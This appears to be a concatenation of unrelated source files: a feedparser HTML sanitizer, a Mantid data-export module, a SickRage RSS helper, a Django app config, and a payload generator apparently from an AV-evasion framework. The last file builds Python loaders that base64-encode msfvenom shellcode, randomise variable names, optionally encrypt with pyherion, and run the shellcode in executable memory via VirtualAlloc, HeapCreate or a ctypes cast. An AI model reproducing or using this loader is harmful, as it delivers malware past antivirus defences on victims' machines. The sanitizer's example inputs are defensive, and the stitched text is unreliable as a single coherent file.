'text-decoration',
'text-indent',
'unicode-bidi',
'vertical-align',
'voice-family',
'volume',
'white-space',
'width',
}
# survey of common keywords found in feeds
acceptable_css_keywords = {
'!important',
'aqua',
'auto',
'black',
'block',
'blue',
'bold',
'both',
'bottom',
'brown',
'center',
'collapse',
'dashed',
'dotted',
'fuchsia',
'gray',
'green',
'italic',
'left',
'lime',
'maroon',
'medium',
'navy',
'none',
'normal',
'nowrap',
'olive',
'pointer',
'purple',
'red',
'right',
'silver',
'solid',
'teal',
'top',
'transparent',
'underline',
'white',
'yellow',
}
valid_css_values = re.compile(
r'^('
r'#[0-9a-f]+' # Hex values
r'|rgb\(\d+%?,\d*%?,?\d*%?\)?' # RGB values
r'|\d{0,2}\.?\d{0,2}(cm|em|ex|in|mm|pc|pt|px|%|,|\))?' # Sizes/widths
r')$'
)
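# For illustration (hypothetical values, not from the test suite): this
# pattern accepts tokens such as '#ff0000', 'rgb(255,0,0)' and '1.5em',
# while a token like 'url(evil)' does not match and is rejected by the
# keyword check in sanitize_style() below.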
mathml_elements = {
'annotation',
'annotation-xml',
'maction',
'maligngroup',
'malignmark',
'math',
'menclose',
'merror',
'mfenced',
'mfrac',
'mglyph',
'mi',
'mlabeledtr',
'mlongdiv',
'mmultiscripts',
'mn',
'mo',
'mover',
'mpadded',
'mphantom',
'mprescripts',
'mroot',
'mrow',
'ms',
'mscarries',
'mscarry',
'msgroup',
'msline',
'mspace',
'msqrt',
'msrow',
'mstack',
'mstyle',
'msub',
'msubsup',
'msup',
'mtable',
'mtd',
'mtext',
'mtr',
'munder',
'munderover',
'none',
'semantics',
}
mathml_attributes = {
'accent',
'accentunder',
'actiontype',
'align',
'alignmentscope',
'altimg',
'altimg-height',
'altimg-valign',
'altimg-width',
'alttext',
'bevelled',
'charalign',
'close',
'columnalign',
'columnlines',
'columnspacing',
'columnspan',
'columnwidth',
'crossout',
'decimalpoint',
'denomalign',
'depth',
'dir',
'display',
'displaystyle',
'edge',
'encoding',
'equalcolumns',
'equalrows',
'fence',
'fontstyle',
'fontweight',
'form',
'frame',
'framespacing',
'groupalign',
'height',
'href',
'id',
'indentalign',
'indentalignfirst',
'indentalignlast',
'indentshift',
'indentshiftfirst',
'indentshiftlast',
'indenttarget',
'infixlinebreakstyle',
'largeop',
'length',
'linebreak',
'linebreakmultchar',
'linebreakstyle',
'lineleading',
'linethickness',
'location',
'longdivstyle',
'lquote',
'lspace',
'mathbackground',
'mathcolor',
'mathsize',
'mathvariant',
'maxsize',
'minlabelspacing',
'minsize',
'movablelimits',
'notation',
'numalign',
'open',
'other',
'overflow',
'position',
'rowalign',
'rowlines',
'rowspacing',
'rowspan',
'rquote',
'rspace',
'scriptlevel',
'scriptminsize',
'scriptsizemultiplier',
'selection',
'separator',
'separators',
'shift',
'side',
'src',
'stackalign',
'stretchy',
'subscriptshift',
'superscriptshift',
'symmetric',
'voffset',
'width',
'xlink:href',
'xlink:show',
'xlink:type',
'xmlns',
'xmlns:xlink',
}
# svgtiny - foreignObject + linearGradient + radialGradient + stop
svg_elements = {
'a',
'animate',
'animateColor',
'animateMotion',
'animateTransform',
'circle',
'defs',
'desc',
'ellipse',
'font-face',
'font-face-name',
'font-face-src',
'foreignObject',
'g',
'glyph',
'hkern',
'line',
'linearGradient',
'marker',
'metadata',
'missing-glyph',
'mpath',
'path',
'polygon',
'polyline',
'radialGradient',
'rect',
'set',
'stop',
'svg',
'switch',
'text',
'title',
'tspan',
'use',
}
# svgtiny + class + opacity + offset + xmlns + xmlns:xlink
svg_attributes = {
'accent-height',
'accumulate',
'additive',
'alphabetic',
'arabic-form',
'ascent',
'attributeName',
'attributeType',
'baseProfile',
'bbox',
'begin',
'by',
'calcMode',
'cap-height',
'class',
'color',
'color-rendering',
'content',
'cx',
'cy',
'd',
'descent',
'display',
'dur',
'dx',
'dy',
'end',
'fill',
'fill-opacity',
'fill-rule',
'font-family',
'font-size',
'font-stretch',
'font-style',
'font-variant',
'font-weight',
'from',
'fx',
'fy',
'g1',
'g2',
'glyph-name',
'gradientUnits',
'hanging',
'height',
'horiz-adv-x',
'horiz-origin-x',
'id',
'ideographic',
'k',
'keyPoints',
'keySplines',
'keyTimes',
'lang',
'marker-end',
'marker-mid',
'marker-start',
'markerHeight',
'markerUnits',
'markerWidth',
'mathematical',
'max',
'min',
'name',
'offset',
'opacity',
'orient',
'origin',
'overline-position',
'overline-thickness',
'panose-1',
'path',
'pathLength',
'points',
'preserveAspectRatio',
'r',
'refX',
'refY',
'repeatCount',
'repeatDur',
'requiredExtensions',
'requiredFeatures',
'restart',
'rotate',
'rx',
'ry',
'slope',
'stemh',
'stemv',
'stop-color',
'stop-opacity',
'strikethrough-position',
'strikethrough-thickness',
'stroke',
'stroke-dasharray',
'stroke-dashoffset',
'stroke-linecap',
'stroke-linejoin',
'stroke-miterlimit',
'stroke-opacity',
'stroke-width',
'systemLanguage',
'target',
'text-anchor',
'to',
'transform',
'type',
'u1',
'u2',
'underline-position',
'underline-thickness',
'unicode',
'unicode-range',
'units-per-em',
'values',
'version',
'viewBox',
'visibility',
'width',
'widths',
'x',
'x-height',
'x1',
'x2',
'xlink:actuate',
'xlink:arcrole',
'xlink:href',
'xlink:role',
'xlink:show',
'xlink:title',
'xlink:type',
'xml:base',
'xml:lang',
'xml:space',
'xmlns',
'xmlns:xlink',
'y',
'y1',
'y2',
'zoomAndPan',
}
svg_attr_map = None
svg_elem_map = None
acceptable_svg_properties = {
'fill',
'fill-opacity',
'fill-rule',
'stroke',
'stroke-linecap',
'stroke-linejoin',
'stroke-opacity',
'stroke-width',
}
def __init__(self, encoding=None, _type='application/xhtml+xml'):
super(_HTMLSanitizer, self).__init__(encoding, _type)
self.unacceptablestack = 0
self.mathmlOK = 0
self.svgOK = 0
def reset(self):
super(_HTMLSanitizer, self).reset()
self.unacceptablestack = 0
self.mathmlOK = 0
self.svgOK = 0
def unknown_starttag(self, tag, attrs):
acceptable_attributes = self.acceptable_attributes
keymap = {}
if tag not in self.acceptable_elements or self.svgOK:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack += 1
# add implicit namespaces to html5 inline svg/mathml
if self._type.endswith('html'):
if not dict(attrs).get('xmlns'):
if tag == 'svg':
attrs.append(('xmlns', 'http://www.w3.org/2000/svg'))
if tag == 'math':
attrs.append(('xmlns', 'http://www.w3.org/1998/Math/MathML'))
# not otherwise acceptable, perhaps it is MathML or SVG?
if tag == 'math' and ('xmlns', 'http://www.w3.org/1998/Math/MathML') in attrs:
self.mathmlOK += 1
if tag == 'svg' and ('xmlns', 'http://www.w3.org/2000/svg') in attrs:
self.svgOK += 1
# choose acceptable attributes based on tag class, else bail
if self.mathmlOK and tag in self.mathml_elements:
acceptable_attributes = self.mathml_attributes
elif self.svgOK and tag in self.svg_elements:
# For most vocabularies, lowercasing is a good idea. Many
# svg elements, however, are camel case.
if not self.svg_attr_map:
lower = [attr.lower() for attr in self.svg_attributes]
mix = [a for a in self.svg_attributes if a not in lower]
self.svg_attributes = lower
self.svg_attr_map = {a.lower(): a for a in mix}
lower = [attr.lower() for attr in self.svg_elements]
mix = [a for a in self.svg_elements if a not in lower]
self.svg_elements = lower
self.svg_elem_map = {a.lower(): a for a in mix}
acceptable_attributes = self.svg_attributes
tag = self.svg_elem_map.get(tag, tag)
keymap = self.svg_attr_map
elif tag not in self.acceptable_elements:
return
# declare xlink namespace, if needed
if self.mathmlOK or self.svgOK:
if any((a for a in attrs if a[0].startswith('xlink:'))):
if not ('xmlns:xlink', 'http://www.w3.org/1999/xlink') in attrs:
attrs.append(('xmlns:xlink', 'http://www.w3.org/1999/xlink'))
clean_attrs = []
for key, value in self.normalize_attrs(attrs):
if key == 'style' and 'style' in acceptable_attributes:
clean_value = self.sanitize_style(value)
if clean_value:
clean_attrs.append((key, clean_value))
elif key in acceptable_attributes:
key = keymap.get(key, key)
# make sure the uri uses an acceptable uri scheme
if key == 'href':
value = make_safe_absolute_uri(value)
clean_attrs.append((key, value))
super(_HTMLSanitizer, self).unknown_starttag(tag, clean_attrs)
def unknown_endtag(self, tag):
if tag not in self.acceptable_elements:
if tag in self.unacceptable_elements_with_end_tag:
self.unacceptablestack -= 1
if self.mathmlOK and tag in self.mathml_elements:
if tag == 'math' and self.mathmlOK:
self.mathmlOK -= 1
elif self.svgOK and tag in self.svg_elements:
tag = self.svg_elem_map.get(tag, tag)
if tag == 'svg' and self.svgOK:
self.svgOK -= 1
else:
return
super(_HTMLSanitizer, self).unknown_endtag(tag)
def handle_pi(self, text):
pass
def handle_decl(self, text):
pass
def handle_data(self, text):
if not self.unacceptablestack:
super(_HTMLSanitizer, self).handle_data(text)
def sanitize_style(self, style):
# disallow urls
style = re.compile(r'url\s*\(\s*[^\s)]+?\s*\)\s*').sub(' ', style)
# gauntlet
if not re.match(r"""^([:,;#%.\sa-zA-Z0-9!]|\w-\w|'[\s\w]+'|"[\s\w]+"|\([\d,\s]+\))*$""", style):
return ''
# This replaced a regexp that used re.match and was prone to
# pathological back-tracking.
if re.sub(r"\s*[-\w]+\s*:\s*[^:;]*;?", '', style).strip():
return ''
clean = []
for prop, value in re.findall(r"([-\w]+)\s*:\s*([^:;]*)", style):
if not value:
continue
if prop.lower() in self.acceptable_css_properties:
clean.append(prop + ': ' + value + ';')
elif prop.split('-')[0].lower() in ['background', 'border', 'margin', 'padding']:
for keyword in value.split():
if (
keyword not in self.acceptable_css_keywords
and not self.valid_css_values.match(keyword)
):
break
else:
clean.append(prop + ': ' + value + ';')
elif self.svgOK and prop.lower() in self.acceptable_svg_properties:
clean.append(prop + ': ' + value + ';')
return ' '.join(clean)
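# For illustration (hypothetical input, not from the test suite):
#   sanitize_style('color: red; nonexistent-prop: foo; font-weight: bold')
#   returns 'color: red; font-weight: bold;' -- unknown properties are
#   dropped, and any url(...) tokens are stripped before the checks run.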
def parse_comment(self, i, report=1):
ret = super(_HTMLSanitizer, self).parse_comment(i, report)
if ret >= 0:
return ret
# if ret == -1, this may be a malicious attempt to circumvent
# sanitization, or a page-destroying unclosed comment
match = re.compile(r'--[^>]*>').search(self.rawdata, i+4)
if match:
return match.end()
# unclosed comment; deliberately fail to handle_data()
return len(self.rawdata)
def _sanitize_html(html_source, encoding, _type):
if not _SGML_AVAILABLE:
return html_source
p = _HTMLSanitizer(encoding, _type)
    # escape CDATA sections so their contents are treated as inert text
    html_source = html_source.replace('<![CDATA[', '&lt;![CDATA[')
p.feed(html_source)
data = p.output()
data = data.strip().replace('\r\n', '\n')
return data
# Match XML entity declarations.
# Example: <!ENTITY copyright "(C)">
RE_ENTITY_PATTERN = re.compile(br'^\s*<!ENTITY([^>]*?)>', re.MULTILINE)
# Match XML DOCTYPE declarations.
# Example: <!DOCTYPE feed [ ]>
RE_DOCTYPE_PATTERN = re.compile(br'^\s*<!DOCTYPE([^>]*?)>', re.MULTILINE)
# Match safe entity declarations.
# This will allow hexadecimal character references through,
# as well as text, but not arbitrary nested entities.
# Example: cubed "&#179;"
# Example: copyright "(C)"
# Forbidden: explode1 "&explode2;&explode2;"
RE_SAFE_ENTITY_PATTERN = re.compile(br'\s+(\w+)\s+"(&#\w+;|[^&"]*)"')
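# Hedged self-check (not part of the upstream module): the comment examples
# above, exercised directly against RE_SAFE_ENTITY_PATTERN. The pattern sees
# the bytes captured by RE_ENTITY_PATTERN, i.e. everything between '<!ENTITY'
# and '>'.
if __name__ == '__main__':  # pragma: no cover
    assert RE_SAFE_ENTITY_PATTERN.match(b' cubed "&#179;"')
    assert RE_SAFE_ENTITY_PATTERN.match(b' copyright "(C)"')
    # Nested entity references are rejected, which blocks exponential expansion.
    assert not RE_SAFE_ENTITY_PATTERN.match(b' explode1 "&explode2;&explode2;"')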
def replace_doctype(data):
"""Strips and replaces the DOCTYPE, returns (rss_version, stripped_data)
rss_version may be 'rss091n' or None
stripped_data is the same XML document with a replaced DOCTYPE
"""
# Divide the document into two groups by finding the location
# of the first element that doesn't begin with '<?' or '<!'.
start = re.search(br'<\w', data)
start = start and start.start() or -1
head, data = data[:start+1], data[start+1:]
# Save and then remove all of the ENTITY declarations.
entity_results = RE_ENTITY_PATTERN.findall(head)
head = RE_ENTITY_PATTERN.sub(b'', head)
# Find the DOCTYPE declaration and check the feed type.
doctype_results = RE_DOCTYPE_PATTERN.findall(head)
doctype = doctype_results and doctype_results[0] or b''
if b'netscape' in doctype.lower():
version = 'rss091n'
else:
version = None
# Re-insert the safe ENTITY declarations if a DOCTYPE was found.
replacement = b''
if len(doctype_results) == 1 and entity_results:
safe_entities = [
e
for e in entity_results
if RE_SAFE_ENTITY_PATTERN.match(e)
]
if safe_entities:
replacement = b'<!DOCTYPE feed [\n<!ENTITY' \
+ b'>\n<!ENTITY '.join(safe_entities) \
+ b'>\n]>'
data = RE_DOCTYPE_PATTERN.sub(replacement, head) + data
# Precompute the safe entities for the loose parser.
safe_entities = {
k.decode('utf-8'): v.decode('utf-8')
for k, v in RE_SAFE_ENTITY_PATTERN.findall(replacement)
}
return version, data, safe_entities
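# Hedged, illustrative demo (not part of the upstream module) of the two
# helpers above. The sample feed text and the 'text/html' content type are
# made up for illustration; exact sanitizer output may differ between builds.
if __name__ == '__main__':  # pragma: no cover
    sample = (b'<!DOCTYPE rss PUBLIC "-//Netscape Communications//DTD RSS 0.91//EN">'
              b'<rss version="0.91"></rss>')
    version, _data, entities = replace_doctype(sample)
    print(version)    # 'rss091n': the Netscape DOCTYPE is recognised
    print(entities)   # {}: no ENTITY declarations, so nothing is re-inserted
    # _sanitize_html() drops elements and attributes that are not whitelisted.
    print(_sanitize_html('<p onclick="evil()">hi<script>x()</script></p>',
                         'utf-8', 'text/html'))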
|
Vagab0nd/SiCKRAGE
|
lib3/feedparser/sanitizer.py
|
Python
|
gpl-3.0
| 24,025
|
#pylint: disable=invalid-name
from __future__ import (absolute_import, division, print_function)
from PyQt4 import QtCore
from mantid.simpleapi import *
import numpy as n
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
def saveCustom(idx,fname,sep = ' ',logs = [],title = False,error = False):
fname+='.dat'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
titl='#'+a1.getTitle()+'\n'
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
f=open(fname,'w')
if title:
f.write(titl)
samp = a1.getRun()
for log in logs:
prop = samp.getLogData(str(log.text()))
headerLine='#'+log.text() + ': ' + str(prop.value) + '\n'
print(headerLine)
f.write(headerLine)
qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
if error:
dq=X1[i]*qres
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
else:
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i]+ "\n"
f.write(s)
f.close()
def saveANSTO(idx,fname):
fname+='.txt'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
sep='\t'
f=open(fname,'w')
qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
dq=X1[i]*qres
s="%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
f.write(s)
f.close()
def saveMFT(idx,fname,logs):
fname+='.mft'
print("FILENAME: ", fname)
a1=mtd[str(idx.text())]
x1=a1.readX(0)
X1=n.zeros((len(x1)-1))
for i in range(0,len(x1)-1):
X1[i]=(x1[i]+x1[i+1])/2.0
y1=a1.readY(0)
e1=a1.readE(0)
sep='\t'
f=open(fname,'w')
f.write('MFT\n')
f.write('Instrument: '+a1.getInstrument().getName()+'\n')
f.write('User-local contact: \n')
f.write('Title: \n')
samp = a1.getRun()
s = 'Subtitle: '+samp.getLogData('run_title').value+'\n'
f.write(s)
s = 'Start date + time: '+samp.getLogData('run_start').value+'\n'
f.write(s)
s = 'End date + time: '+samp.getLogData('run_end').value+'\n'
f.write(s)
for log in logs:
prop = samp.getLogData(str(log.text()))
headerLine=log.text() + ': ' + str(prop.value) + '\n'
print(headerLine)
f.write(headerLine)
f.write('Number of file format: 2\n')
s = 'Number of data points:\t' + str(len(X1))+'\n'
f.write(s)
f.write('\n')
f.write('\tq\trefl\trefl_err\tq_res\n')
qres=(X1[1]-X1[0])/X1[1]
print("Constant dq/q from file: ",qres)
for i in range(len(X1)):
dq=X1[i]*qres
s="\t%e" % X1[i] +sep+"%e" % y1[i] +sep + "%e" % e1[i] + sep + "%e" % dq +"\n"
f.write(s)
f.close()
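def _illustrate_qres():
    """Hedged illustration (not part of the upstream module): the bin-centre
    and constant dq/q arithmetic shared by saveCustom/saveANSTO/saveMFT, using
    made-up numbers instead of a Mantid workspace."""
    x1 = n.array([0.010, 0.012, 0.014])   # bin edges, as returned by readX(0)
    X1 = (x1[:-1] + x1[1:]) / 2.0         # bin centres
    qres = (X1[1] - X1[0]) / X1[1]        # constant dq/q resolution
    dq = X1 * qres                        # per-point resolution column
    return X1, qres, dq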
|
dymkowsk/mantid
|
scripts/Reflectometry/isis_reflectometry/saveModule.py
|
Python
|
gpl-3.0
| 3,083
|
# coding=utf-8
import re
import urlparse
from feedparser.api import parse
from feedparser.util import FeedParserDict
from sickbeard import logger
from sickrage.helper.exceptions import ex
def getFeed(url, request_headers=None, handlers=None):
parsed = list(urlparse.urlparse(url))
parsed[2] = re.sub("/{2,}", "/", parsed[2]) # replace two or more / with one
try:
feed = parse(url, False, False, request_headers, handlers=handlers)
if feed:
if 'entries' in feed:
return feed
elif 'error' in feed.feed:
err_code = feed.feed['error']['code']
err_desc = feed.feed['error']['description']
logger.log(u'RSS ERROR:[%s] CODE:[%s]' % (err_desc, err_code), logger.DEBUG)
else:
logger.log(u'RSS error loading url: ' + url, logger.DEBUG)
except Exception as e:
logger.log(u'RSS error: ' + ex(e), logger.DEBUG)
return FeedParserDict()
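def _example_usage():  # pragma: no cover
    """Hedged usage sketch (not part of the original module). The URL and the
    Accept header below are placeholders, not values used by SickRage."""
    feed = getFeed('https://example.com/rss',
                   request_headers={'Accept': 'application/rss+xml'})
    for entry in feed.get('entries', []):
        logger.log(u'Found entry: %s' % entry.get('title'), logger.DEBUG)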
|
pkoutsias/SickRage
|
sickbeard/rssfeeds.py
|
Python
|
gpl-3.0
| 982
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.apps import AppConfig
class LoginConfig(AppConfig):
name = 'login'
|
InspectorIncognito/visualization
|
login/apps.py
|
Python
|
gpl-3.0
| 150
|
"""
This payload receives the msfvenom shellcode, base64 encodes it, and stores it within the payload.
At runtime, the executable decodes the shellcode and executes it in memory.
module by @christruncer
"""
import base64
from datetime import date
from datetime import timedelta
from modules.common import shellcode
from modules.common import helpers
from modules.common import encryption
class Payload:
def __init__(self):
# required options
self.description = "Base64 encoded shellcode is decoded at runtime and executed in memory"
self.language = "python"
self.extension = "py"
self.rating = "Excellent"
self.shellcode = shellcode.Shellcode()
# options we require user interaction for- format is {OPTION : [Value, Description]]}
self.required_options = {
"COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
"USE_PYHERION" : ["N", "Use the pyherion encrypter"],
"INJECT_METHOD" : ["Virtual", "Virtual, Void, Heap"],
"EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
}
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
RandT = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
PayloadCode = 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'import base64\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
ShellcodeVariableName = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
DecodedShellcode = helpers.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
